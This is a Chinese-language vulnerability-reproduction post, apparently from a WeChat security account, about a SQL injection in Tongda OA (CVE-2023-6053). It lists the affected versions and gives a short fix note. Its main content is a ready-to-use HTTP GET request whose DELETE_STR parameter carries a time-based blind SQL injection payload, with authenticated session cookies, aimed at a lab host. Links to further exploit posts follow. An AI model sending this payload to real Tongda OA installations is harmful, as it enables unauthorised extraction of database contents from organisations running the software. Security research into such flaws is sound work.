【漏洞复现】通达OA SQL注入漏洞（CVE-2023-6053）

admin

103423
文章

87
评论

2023年11月27日08:10:36评论27 views字数 902阅读3分0秒阅读模式

声明：请勿将文章内的相关技术用于非法目的，如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。

官网：

https://www.tongda2000.com/

漏洞编号：

CVE-2023-6053

影响范围：

通达OA >= 2017版

通达OA < 11.10

复现环境：

通达OA 2017版

0X02 漏洞复现

漏洞利用需登录。

POC：

GET /general/system/censor_words/manage/delete.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1Host: 192.168.245.134Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=620a3f5c; _csrf=fb9605328bee63ab5b949c268b858d698cf75170a848c7b0882a2b8a14d66f71a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22dJ8hKTNoKf_MTAQdu5ag7otcWNXsBgUm%22%3B%7D; creat_work=new; PHPSESSID=uim7dre68mjnos5qhk7oljv264; SID_66=1ca61957Upgrade-Insecure-Requests: 1

右下角看延时

0X03 修复建议

更新至最新版！

原文始发于微信公众号（皓月的笔记本）：【漏洞复现】通达OA SQL注入漏洞（CVE-2023-6053）

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】通达OA SQL注入漏洞（CVE-2023-6053）

【漏洞预警】Apache OFBiz 目录遍历导致RCE漏洞CVE-2024-32113

【漏洞通告】BIG-IP Next Central Manager多个注入漏洞安全风险通告

用友U8 CRM客户关系管理系统 downloadfile 任意文件读取

用友-U8C-Cloud upload sql注入漏洞复现

漏洞预警 | Travelpayouts开放式重定向漏洞

漏洞复现-福建科立讯通信指挥调度管理平台ajax_users.php 存在SQL注入

漏洞复现-禅道身份认证绕过漏洞

用友U8-CRM客户关系管理系统downloadfile.php 任意文件读取漏洞

【0day】瑞友天翼应用虚拟化系统

QVD-2024-15263：禅道身份认证绕过漏洞

发表评论

在线咨询

微信